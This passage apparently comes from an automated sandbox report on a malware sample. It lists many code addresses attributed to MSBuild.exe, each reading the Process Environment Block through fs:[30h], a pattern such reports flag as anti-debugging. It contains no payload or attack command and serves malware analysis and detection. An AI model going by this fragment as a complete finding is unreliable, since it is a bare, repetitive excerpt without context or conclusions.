          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01567016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0157B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01563884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01563884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01513B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01513B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01574257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0152927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0159B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01503A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01524A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01524A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01507D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01523D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01563540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01593D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0150C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0156A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01514D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01566DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01598DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_015AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_014E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0151FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_01512581 mov eax, dword ptr fs:[00000030h]
